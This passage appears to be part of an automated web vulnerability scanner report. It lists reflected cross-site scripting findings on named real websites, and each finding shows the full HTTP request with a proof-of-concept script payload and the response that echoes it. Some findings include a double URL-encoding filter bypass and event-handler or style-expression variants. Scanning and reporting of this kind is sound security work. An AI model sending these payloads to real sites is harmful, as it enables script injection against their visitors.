This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=30044449"%3balert(1)//57b0f102807&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB29
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:41 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:41 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="30044449";alert(1)//57b0f102807";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="un
...[SNIP]...

6.38. http://www.610wtvn.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.610wtvn.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 735de"><script>alert(1)</script>53920edd13d was submitted in the REST URL parameter 1. This input was echoed as 735de\"><script>alert(1)</script>53920edd13d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico735de"><script>alert(1)</script>53920edd13d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.610wtvn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 3790457961
X-Cache-Server: varnish02
Expires: Tue, 03 May 2011 11:40:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:40:37 GMT
Content-Length: 32669
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - News Talk 610 WTVN | Best Buckeye Coverage | Colu
...[SNIP]...
<meta property="og:url" content="http://www.610wtvn.com/favicon.ico735de\"><script>alert(1)</script>53920edd13d" />
...[SNIP]...

6.39. http://www.610wtvn.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.610wtvn.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff15d"><script>alert(1)</script>dfbba2ca5f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff15d\"><script>alert(1)</script>dfbba2ca5f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?ff15d"><script>alert(1)</script>dfbba2ca5f3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.610wtvn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 3395353806
X-Cache-Server: varnish01
Expires: Tue, 03 May 2011 11:40:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:40:31 GMT
Content-Length: 32672
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - News Talk 610 WTVN | Best Buckeye Coverage | Colu
...[SNIP]...
<meta property="og:url" content="http://www.610wtvn.com/favicon.ico?ff15d\"><script>alert(1)</script>dfbba2ca5f3=1" />
...[SNIP]...

6.40. http://www.alvinisd.net/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.alvinisd.net
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5590<script>alert(1)</script>65d717db4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa5590<script>alert(1)</script>65d717db4a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alvinisd.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 10:46:02 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=c961f65a156b6343d4b963f71aff4a55; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2796
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">favicon.icoa5590<script>alert(1)</script>65d717db4a</div>
...[SNIP]...

6.41. http://www.am570radio.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.am570radio.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85f60"><script>alert(1)</script>7472f3ccde was submitted in the REST URL parameter 1. This input was echoed as 85f60\"><script>alert(1)</script>7472f3ccde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico85f60"><script>alert(1)</script>7472f3ccde HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.am570radio.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 4192825522
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 11:24:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:24:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34497

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - AM 570 KLAC K-Los Angeles California/Orange Count
...[SNIP]...
<meta property="og:url" content="http://www.am570radio.com/favicon.ico85f60\"><script>alert(1)</script>7472f3ccde" />
...[SNIP]...

6.42. http://www.am570radio.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.am570radio.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3439b"><script>alert(1)</script>89da71ed857 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3439b\"><script>alert(1)</script>89da71ed857 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?3439b"><script>alert(1)</script>89da71ed857=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.am570radio.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 3790118289
X-Cache-Server: varnish02
Expires: Tue, 03 May 2011 11:24:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:24:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34505

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - AM 570 KLAC K-Los Angeles California/Orange Count
...[SNIP]...
<meta property="og:url" content="http://www.am570radio.com/favicon.ico?3439b\"><script>alert(1)</script>89da71ed857=1" />
...[SNIP]...

6.43. http://www.aquascapeonline.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aquascapeonline.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f2c5"><script>alert(1)</script>c2b8edb6758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?4f2c5"><script>alert(1)</script>c2b8edb6758=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aquascapeonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Content-Length: 20675
Content-Type: text/html
Set-Cookie: language=en; expires=Thu, 02-Jun-2011 10:46:24 GMT; path=/
Set-Cookie: CurrencyCode=USD; expires=Thu, 02-Jun-2011 10:46:24 GMT; path=/
Set-Cookie: Refer=; expires=Wed, 04-May-2011 10:46:24 GMT; path=/
Set-Cookie: s=%3A%3A; expires=Wed, 04-May-2011 10:46:24 GMT; path=/
Set-Cookie: ASPSESSIONIDCACTACRQ=OGGIAFJDLHFDAGACDGJDLKMD; path=/
Cache-control: private

<!-- ******************************************
MAY NOT BE REMOVED

CandyPress Shopping Cart Version 3.3
http://www.candypress.com
Copyright 2005 by Shopping Tree, Inc.

MAY NOT BE REM
...[SNIP]...
<form method="POST" action="http://www.aquascapeonline.com/custom404.asp?404;http://www.aquascapeonline.com:80/favicon.ico?4f2c5"><script>alert(1)</script>c2b8edb6758=1" name="LangChange">
...[SNIP]...

6.44. http://www.ashop.com.au/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ashop.com.au
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9fc6"-alert(1)-"cc0bd250eb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico?e9fc6"-alert(1)-"cc0bd250eb4=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ashop.com.au
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:32 GMT
Server: Microsoft-IIS/6.0
S: 1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: SD=32765249823E4A8A9C331D4F26B28A5C; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>

</title><script type="text/javascript">var TimeZone = 10;var Current_page_URL = "http://www.ashop.com.au/favicon.ico?e9fc6"-alert(1)-"cc0bd250eb4=1"; var mySiteID = 336; var hkey=""; var MachineCode = "QC8T6BQ7"</script>
...[SNIP]...

6.45. http://www.bigtitcreampie.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bigtitcreampie.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1534a"-alert(1)-"9a18ac6c6e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico1534a"-alert(1)-"9a18ac6c6e1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bigtitcreampie.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:31:39 GMT
Server: Apache
Set-Cookie: nomobile=0; path=/; domain=.bigtitcreampie.com; expires=Wed, 04-May-2011 07:31:39 GMT
Vary: Host,Accept-Encoding,User-Agent,Accept-Language
X-Powered-By: PHP/5.2.11-pl1-gentoo
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: psinfo=bbonet%7Cbigtitcreampie%7C1%7Cpps%7C%7C%7C%7C%7C%7C%7C%7C%7Cus; expires=Thu, 02-Jun-2011 11:31:39 GMT; path=/; domain=.bigtitcreampie.com
Set-Cookie: psextra=173.193.214.243%7COK%3B%7C; expires=Thu, 02-Jun-2011 11:31:39 GMT; path=/; domain=.bigtitcreampie.com
Cache-Control: max-age=900
Expires: Tue, 03 May 2011 11:46:39 GMT
Content-Type: text/html
Content-Length: 8703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title></title> <meta http-equiv="Content-Language" content="e
...[SNIP]...

var pageTracker = _gat._getTracker("");
pageTracker._setCampNameKey('id');
pageTracker._setVar("bbonet");
pageTracker._trackPageview("www.bigtitcreampie.com/favicon.ico1534a"-alert(1)-"9a18ac6c6e1");
}
catch(err) {}
</script>
...[SNIP]...

6.46. http://www.bigtitcreampie.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bigtitcreampie.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5933"-alert(1)-"62cc159c67b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico?e5933"-alert(1)-"62cc159c67b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bigtitcreampie.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:31:35 GMT
Server: Apache
Set-Cookie: nomobile=0; path=/; domain=.bigtitcreampie.com; expires=Wed, 04-May-2011 07:31:35 GMT
Vary: Host,Accept-Encoding,User-Agent,Accept-Language
X-Powered-By: PHP/5.2.11-pl1-gentoo
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: psinfo=bbonet%7Cbigtitcreampie%7C1%7Cpps%7C%7C%7C%7C%7C%7C%7C%7C%7Cus; expires=Thu, 02-Jun-2011 11:31:35 GMT; path=/; domain=.bigtitcreampie.com
Set-Cookie: psextra=173.193.214.243%7COK%3B%7C; expires=Thu, 02-Jun-2011 11:31:35 GMT; path=/; domain=.bigtitcreampie.com
Cache-Control: max-age=900
Expires: Tue, 03 May 2011 11:46:35 GMT
Content-Type: text/html
Content-Length: 8706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title></title> <meta http-equiv="Content-Language" content="e
...[SNIP]...
var pageTracker = _gat._getTracker("");
pageTracker._setCampNameKey('id');
pageTracker._setVar("bbonet");
pageTracker._trackPageview("www.bigtitcreampie.com/favicon.ico?e5933"-alert(1)-"62cc159c67b=1");
}
catch(err) {}
</script>
...[SNIP]...

6.47. http://www.bvonstyle.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bvonstyle.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c33c"><x%20style%3dx%3aexpression(alert(1))>b9601e04b3b was submitted in the REST URL parameter 1. This input was echoed as 7c33c"><x style=x:expression(alert(1))>b9601e04b3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.ico7c33c"><x%20style%3dx%3aexpression(alert(1))>b9601e04b3b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bvonstyle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Tue, 03-May-2011 12:05:45 GMT; path=/
Content-Type: text/html
Content-Length: 10952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>BV on Style</title>
...[SNIP]...
<link rel="canonical" href="http://www.bvonstyle.com/favicon.ico7c33c"><x style=x:expression(alert(1))>b9601e04b3b/" />
...[SNIP]...

6.48. http://www.cashstore.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cashstore.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 221b9"><img%20src%3da%20onerror%3dalert(1)>9c5e9d404d0 was submitted in the REST URL parameter 1. This input was echoed as 221b9"><img src=a onerror=alert(1)>9c5e9d404d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico221b9"><img%20src%3da%20onerror%3dalert(1)>9c5e9d404d0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cashstore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:19:31 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESSbf3783e9f35cdd20ff6d0dfc9f8a8166=mjp0b56fnrvqibpd3n3tbbgg00; expires=Thu, 26-May-2011 14:52:51 GMT; path=/; domain=.cashstore.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 11:19:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 7750
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<body class="not-front not-logged-in page-faviconico221b9img-srca-onerroralert19c5e9d404d0 no-sidebars favicon.ico221b9"><img src=a onerror=alert(1)>9c5e9d404d0 favicon.ico221b9">
...[SNIP]...

6.49. http://www.cerritos.edu/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cerritos.edu
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 367ec%253cscript%253ealert%25281%2529%253c%252fscript%253ea2a333b627d was submitted in the REST URL parameter 1. This input was echoed as 367ec<script>alert(1)</script>a2a333b627d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /favicon.ico367ec%253cscript%253ealert%25281%2529%253c%252fscript%253ea2a333b627d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cerritos.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:28 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Mon, 02 May 2011 11:42:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us">
<head><titl
...[SNIP]...
<p />(Referring Page: favicon.ico367ec<script>alert(1)</script>a2a333b627d)
<p />
...[SNIP]...

6.50. http://www.churchleaderinsights.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.churchleaderinsights.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b9b8<script>alert(1)</script>fb5f52160f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2b9b8<script>alert(1)</script>fb5f52160f9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.churchleaderinsights.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:34 GMT
Server: Apache
Set-Cookie: exp_last_visit=989059834; expires=Wed, 02-May-2012 10:50:34 GMT; path=/
Set-Cookie: exp_last_activity=1304419834; expires=Wed, 02-May-2012 10:50:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A19%3A%22oops-page-not-found%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 10:50:35 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Oops...
...[SNIP]...
<strong>/favicon.ico2b9b8<script>alert(1)</script>fb5f52160f9</strong>
...[SNIP]...

6.51. http://www.click-now.net/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.click-now.net
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c67c7"><a>a859c78e1d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico?c67c7"><a>a859c78e1d3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.click-now.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:49:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: _downloadBarCom=3f8b63343a99c3443f4758b05ac2e929; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _downloadBarCom=9661ebbcbb2536ac2e3b1d997866c9db; path=/
Content-Type: text/html
Content-Length: 10417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a id="tellafriend" href="http://www.downloadbar.com/tellafriend.php?page=www.click-now.net/favicon.ico?c67c7"><a>a859c78e1d3=1&keepThis=true&TB_iframe=true&height=280&width=550" class="thickbox pinklink">
...[SNIP]...

6.52. http://www.coinmerc.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coinmerc.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b49f"><script>alert(1)</script>1e753f7fc5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?5b49f"><script>alert(1)</script>1e753f7fc5c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coinmerc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 68308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<title>
...[SNIP]...
<a href="http://www.coinmerc.com/ko/index/5b49f"><script>alert(1)</script>1e753f7fc5c/1/5b49f">
...[SNIP]...

6.53. http://www.diethealthclub.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.diethealthclub.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190f9"><script>alert(1)</script>47bfedf4e79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico190f9"><script>alert(1)</script>47bfedf4e79 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diethealthclub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:29:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=2lpi2j10dudnotdiacb4u7tnd0; expires=Wed, 02 May 2012 10:29:02 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not Found</
...[SNIP]...
